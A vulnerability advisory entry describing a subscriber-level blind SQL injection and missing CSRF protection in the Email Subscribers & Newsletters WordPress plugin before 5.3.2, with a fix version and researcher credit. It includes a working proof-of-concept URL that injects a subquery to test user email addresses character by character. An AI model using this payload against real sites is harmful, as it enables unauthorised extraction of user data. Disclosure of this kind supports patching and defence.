WordPress Plugin Vulnerabilities

Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection

Description

The plugin does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ajax_fetch_report_list&order=,%20(select%201%20from%20wp_users%20where%20user_email%20like%200x6725%20union%20select%202)%20--%20g

This will return an error result if there is an e-mail starting with g in the database.

Affects Plugins

Fixed in 5.3.2

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-02-11 (about 2 years ago)
Added
2022-02-11 (about 2 years ago)
Last Updated
2022-11-17 (about 1 years ago)

Other